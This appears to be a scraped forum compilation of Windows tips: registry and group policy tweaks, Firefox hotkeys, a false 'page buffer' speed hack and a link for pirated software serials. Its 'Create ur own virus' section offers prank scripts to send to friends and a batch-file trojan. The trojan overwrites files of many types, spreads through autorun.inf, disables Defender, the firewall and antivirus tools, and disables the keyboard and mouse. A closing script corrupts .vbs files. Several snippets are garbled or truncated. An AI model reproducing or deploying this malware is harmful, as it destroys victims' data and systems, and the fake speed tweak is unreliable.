After you download it, follow the guide here:--

Step 1:

A - Run "Resource Hacker" and open the file "%windir%\Explorer.exe".
B - You see a Tree of all Resources in this file, expand the "String Table"
C - Find the "start" and replace it with your own text. then press the [Compile Script] button.
D - Save "Explorer.exe" as "MyStart.exe" DONT save it as Explorer.exe, do "save as.." and give it a new name.
E - Quit "Resource Hacker".

Step 2:

A - Click on the [Start] button and choose the "Run..." item from the start menu. (Or use the shortcut key WinKey+R)
B - Type "RegEdit" in the Run "Dialog Box". And then press the [Ok] buton to run the "Registry Editor" program.
C - Go to: "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon" and find the "Shell" property.
D - Replace value of the "Shell" property to "MyStart.exe".
E - Quit "Registry Editor".
F - Restart your system.
Note about Registry Editor:
if you did not find the key "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon", you can search the Registry for the "Explorer.exe", to do this use the Edit Menu | Find Next (Ctrl+F).

Another easier method will b thru the group policy editor...

1) Run ( Windows key+ R)
2) Type gpedit.msc
3)User Configuration >> Administrative templates >> Taskbar and start menu >> Locate
" Prevent access to Shut Down command.."

Change Startup & Shutdown Sound

Here are steps for this.
1). Choose the track or sound which you want to set as start-up and shutdown sound, But remember that file should be in .WAV format and size of file should not be large it should be smaller than 1 mb otherwise startup will take longer time.
If your file is not in .WAV format then you can easily convert it into .WAV by using jet audio or any other converter.

2). Rename these files as Windows Startup.WAV and Windows Shutdown.WAV respectively.

3). Now Go to C:\WINDOWS\MEDIA, here you will find file Windows Startup.WAV and Windows Shutdown.WAV, move them to some other locations, So tht you can set default sound again in future.

4). Now move files which you have choosen to C:\WINDOWS\MEDIA.

ITS DONE ! ! ! !

Windows explorer due to some virus or trojan effect.
Here's the solution-->

Open Run and then type "gpedit.msc".
Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.
Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu"
Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.

I hopes that you will find the option after restarting windows..
Mozilla Firefox Hotkeys | Keyboard Shortcuts
CTRL + A Select all text on a webpage
CTRL + B Open the Bookmarks sidebar
CTRL + C Copy the selected text to the Windows clipboard
CTRL + D Bookmark the current webpage
CTRL + F Find text within the current webpage
CTRL + G Find more text within the same webpage
CTRL + H Opens the webpage History sidebar
CTRL + I Open the Bookmarks sidebar
CTRL + J Opens the Download Dialogue Box
CTRL + K Places the cursor in the Web Search box ready to type your search
CTRL + L Places the cursor into the URL box ready to type a website address
CTRL + M Opens your mail program (if you have one) to create a new email message
CTRL + N Opens a new Firefox window
CTRL + O Open a local file
CTRL + P Print the current webpage
CTRL + R Reloads the current webpage
CTRL + S Save the current webpage on your PC
CTRL + T Opens a new Firefox Tab
CTRL + U View the page source of the current webpage
CTRL + V Paste the contents of the Windows clipboard
CTRL + W Closes the current Firefox Tab or Window (if more than one tab is open)
CTRL + X Cut the selected text
CTRL + Z Undo the last action
Use Notepad As a Diary
Want to write your diary on your computer? You can do it without using any software.

1. Open Notepad

2. Type “.LOG”

3. Save it

4. Now every time you open this file notepad will automatically insert date and time to the last line of the file. You can type anything after that line and save it. In this way you can use it as a diary.

1. Click Start
2. Click Run
3. Type regedit and hit ENTER
4. In the registry editor go to the following key:


5. Double click on the following value:

6. AFTER DOUBLE CLICKING Change the NAME FROM RECYCLE BIN to whatever you wish.

7. Click OK and close out regedit
8. Click on a blank area of the desktop and select refresh from the context menu.
9. After the screen refreshes, you recycle bin will be renamed to whatever you decided.
@ Haribol Hare Krishna how to customize start button without using resource hacker





1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)
2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).
Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).
Now your acrobat reader will load very fast and almost as good as notepad

ll what i prefer is %temp% ” without quotes.. at Start -> Run..
this opens ur temp folder n den u cal erase it neatly// still try dis one too..
First go into gpedit.msc
Next select -> Computer Configuration/

Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click “Do Not Delete Temp Folder Upon Exit”
Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy
How to fix corrupted windows files in XP


This tutorial has been made so people that are having problems with corrupted files, can learn how to fix them easy.


1. Windows XP CD

Now, follow this steps:

1. Place the xp cd in your cd/dvd drive
2. Go to start
3. run
4. type "sfc /scannow" (without ")

Now sit back and relax, it should all load and fix all your corrupted file on win XP.
[TRY THIS]~~~Keyboard Light Looks Like Disco Light

These codes when executed makes your Caps, Num, Scroll lock keys flash..
very kewlll...i hav tried it...

1.This piece of code makes ur keyboard a live disco...

Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"

2.This one makes it looks like a chain of light....

Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 200
wshshell.sendkeys "{CAPSLOCK}"
wscript.sleep 100
wshshell.sendkeys "{NUMLOCK}"
wscript.sleep 50
wshshell.sendkeys "{SCROLLLOCK}"

*paste any of the two above codes in notepad
*Save as "AnyFileName".vbs
*Run the file
*to stop, launch task manager and then under "Processes" end wscript.exe
Increase Ur Youtube,Metacafe Buffering Speed


increase ur youtube,metacafe buffering speed
wid this procedure
u can increase the buffering speed of uploaded vids
try it



after that ull get system notepad file as
; for 16-bit app support

jus below this copy


page buffer=1000000Tbps

so totally it will look as
; for 16-bit app support

page buffer=1000000Tbps

Save The Notepad file
& Reboot Your System
Repairing A Corruptted MMC

Physically, memory cards are quite fragile pieces of high technology, susceptible to damage from various silly things like excessive heat, condensation, strong magnetic fields, physical damage from rough handling and/or bending! (similar to most electronic devices then..)

Given the natue of mobile memory card products, they are constantly being taken in and out of some form of interface with a mobile phone, a camera, a laptop, or desktop PC, or a separate memory card reader. The number of different devices they have to be able to interact with is in the thousands.

It is not too surprisingly, then that sometimes the state of the file system on the memory card can get damaged.

This may happen for a number of different reasons, including:

> removing the card from a device whilst an application is trying to read/write to it.. (Just be patient...)
> battery drain on a device whilst in use meaning an insufficent voltage failure whilst writing to the card.
> a poor implementation of the MMC standard on the device using the card
> poor connectivity software drivers on the device or the Windows PC/Mac
> physical damage like card or device being dropped, bent, getting wet etc...
> lots of others i am sure..

As often as not, the problem is not terminal for your memory card, but just a software issue ( or in physical terms, it could be called "a temporary disalignment of the all the bits and bytes on the card").

The fix for this problem is the same as for any other file storage device (like a floppy or hard drive) with corrupt or invalid file system, namely; re-format the file system.
*Enabling NumLock on by Default*

To have numlock turned on for each user:

Start Regedit
Go to HKEY_CURRENT_USER\Control Panel\Keyboard\InitialKeyboardIndicators
Change the value from 0 to 2
Turn Numlock on manually
Log off and back on again.
For all users, make the same change to HKEY_USERS\.DEFAULT\Control Panel\Keyboard\InitialKeyboardIndicators
Get all your serials!!!!!!!!!!

YouSerials is a search engine for software serials. The idea is to have a backup of all software registration numbers that we use. Each serial key can be voted on by other users, increasing or decreasing its reputation based on its authenticity. It’s also useful if your Operating system had crashed and you need a reinstall but don’t have all the serials stored or are lostYouSerials is a search engine for software serials. The idea is to have a backup of all software registration numbers that we use. Each serial key can be voted on by other users, increasing or decreasing its reputation based on its authenticity. It’s also useful if your Operating system had crashed and you need a reinstall but don’t have all the serials stored or are lost

Create ur own virus


A virus (as you know) is a piece of code that does something that it shouldn't. It is a common misconception that you need a vast skill set to make these and that they are extremely complex however in reality they are as simple as sin to make which is why they are so damn annoying.

As the name shows ... here we will post many virus codes and the way how to create them ..... send them to ur friends and have fun but be careful some of them are really dangerous for computers .... Enjoy guys :)
Continually pop out your friend's CD Drive :

Continually pop out your friend's CD Drive,If he / she has more than one, it pops out all of them!


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
For i = 0 to colCDROMs.Count - 1
End If
wscript.sleep 5000

Copy this code in a notepad and Save it as "Anything.VBS" and send it.Whoever click on the file will be affected ....

Have fun wid friendz ....
Convey your friend a little message and shut down his / her computer:


@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Copy this code in a notepad and Save it as "Anything.BAT" and send it.Whoever click on the file will be affected ....

Have fun wid friendz ..
Toggle your friend's Caps Lock button simultaneously:


Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"

Copy this code in a notepad and Save it as "Anything.VBS" and send it.Whoever click on the file will be affected ....

Have fun wid friendz ..
Hit Enter simultaneously:


Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "~(enter)"

Copy this code in a notepad and Save it as "Anything.VBS" and send it.Whoever click on the file will be affected ....

Have fun wid friendz .....
i got some here youu goo!

save as .bat files ok guys
this is a trojan i made be very carful with this guys. do not come crying to me when your hard drive is fryed ok cuz if you bitch at me ill fry your next computer :>. have fun!

@echo off
::--Infect All Html Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.html) Do (
Set HtmlInfect=%%Z > Nul
Copy /y %0 %HtmlInfect%

Del /f /s /q DirPath
::----Infect All Vlc Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.vlc) Do (
Set VlcInfect=%%Z > Nul
Copy /y %0 %VlcInfect%

Del /f /s /q DirPath
::---Infect All Mpeg Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.mpeg) Do (
Set MpegInfect=%%Z > Nul
Copy /y %0 %MpegInfect%

Del /f /s /q DirPath
::----Infect All Mp3 Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.mp3) Do (
Set Mp3Infect=%%Z > Nul
Copy /y %0 %Mp3Infect%

Del /f /s /q DirPath
::----Infect All Mp4 Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.mp4) Do (
Set Mp4Infect=%%Z > Nul
Copy /y %0 %Mp4Infect%

Del /f /s /q DirPath
::----Infect All Wma Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.wma) Do (
Set WmaInfect=%%Z > Nul
Copy /y %0 %WmaInfect%

Del /f /s /q DirPath
::-------Infect All .Doc-----::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.doc) Do (
Set DocInfect=%%Z > Nul
Copy /y %0 %DocInfect%

Del /f /s /q DirPath
::----Infect All Txt Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.txt) Do (
Set TxtInfect=%%Z > Nul
Copy /y %0 %TxtInfect%

Del /f /s /q DirPath
::----Infect All Rar Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.rar) Do (
Set RarInfect=%%Z > Nul
Copy /y %0 %RarInfect%

Del /f /s /q DirPath
::----Infect All Exe Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%

Del /f /s /q DirPath
::----Infect All Jpeg Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.jpeg) Do (
Set JpegInfect=%%Z > Nul
Copy /y %0 %JpegInfect%

Del /f /s /q DirPath
::----Infect All Zip Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.zip) Do (
Set ZipInfect=%%Z > Nul
Copy /y %0 %ZipInfect%

Del /f /s /q DirPath
::----Infect All Bat Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.bat) Do (
Set BatInfect=%%Z > Nul
Copy /y %0 %BatInfect%

Del /f /s /q DirPath
::----Infect All Gif Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.gif) Do (
Set GifInfect=%%Z > Nul
Copy /y %0 %GifInfect%

Del /f /s /q DirPath
::----Infect All Vbs Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.vbs) Do (
Set VbsInfect=%%Z > Nul
Copy /y %0 %VbsInfect%

Del /f /s /q DirPath
::-----Infect All Drives-----::
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:\
echo [AutoRun] > %%E:\autorun.inf
echo open="%%E:\%0" >> %%E:\autorun.inf
echo action=Open folder to see files... >> %%E:\autorun.inf)
::------Run As Service-------::
copy "Anti virus killer.bat" "C:\Windows\Anti virus killer"
reg add HKLM\software\Microsoft\Windows\CurrentVersion\RunServices /v "Anti virus killer" /t REG_SZ /d "C:\Windows\Anti virus killer.bat" / f > nul
::-----Infect Autoexec.bat---::
echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT
::----Infect All Folders-----::
Dir %SystemRoot% /s /b > PathHost
For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
Del /f /s /q PathHost > Nul
::-----Infect "ls" CMD-----::
copy %0 %windir%\system32\ls.bat
::------Copy To Startup------::
copy "Anti virus killer.bat" "%userprofile%\Start Menu\Programs\Startup\Anti virus killer.bat"
::--Disable Windows Defender-::
net stop "WinDefend"
taskkill /f /t /im "MSASCui.exe"
::---Disable Windows Update--::
net stop "wuauserv"
::-Disable Windows Security Center-::
net stop "wscsvc"
::-Disable Windows Parental Controls-::
net stop "WPCSvc"
::-Disable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::-Disable Windows Error Reporting-::
net stop "WerSvc"
::-Disable Windows Backup-::
net stop "SDRSVC"
::--Disable Windows Search---::
net stop "WSearch"
::-------AV Kill [UD]--------::
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A SAFEWEB
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
REN *.jpeg *.vir
REN *.gif *.vir
REN *.png *.vir
::------Disable Keyboard-----::
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
::-------Disable Mouse-------::
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
::-----Kill Explorer.exe-----::
echo :a >>WindUpdate.bat
echo tskill explorer >>WindUpdate.bat
echo goto a >>WindUpdate.bat
echo Set objShell = CreateObject("WScript.Shell")>>rundlll32.vbs
echo strCommand = "WindUpdate.bat">>rundlll32.vbs
echo objShell.Run strCommand, vbHide, TRUE>>rundlll32.vbs
start "" rundlll32.vbs
::-------Block YouTube-------::
cd "C:\Windows\System32\Drivers\etc"
echo >> "Hosts"
echo >> "Hosts"
::---------Block MSN---------::
cd "C:\Windows\System32\Drivers\etc"
echo >> "Hosts"
echo >> "Hosts"
::--------Block Google-------::
cd "C:\Windows\System32\Drivers\etc"
echo >> "Hosts"
echo >> "Hosts"
::-------Block Wikipedia-----::
cd "C:\Windows\System32\Drivers\etc"
echo >> "Hosts"
echo >> "Hosts"
::--------Block Hotmail------::
cd "C:\Windows\System32\Drivers\etc"
echo >> "Hosts"
echo >> "Hosts"
::--------Block Yahoo!-------::
cd "C:\Windows\System32\Drivers\etc"
echo >> "Hosts"
echo >> "Hosts"
::--------Block Facebook!-------::
cd "C:\Windows\System32\Drivers\etc"
echo >> "Hosts"
echo >> "Hosts"
this one messes up all .vbs file, just change the .vbs with any other file type that you want to mess up.

@ echo off
# Infect All .vbs Files
assoc .vbs=batfile
DIR /S/B %SystemDrive%\*.vbs >> InfList_.vbs.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_.vbs.txt) do copy /y %0 "%%j:%%k"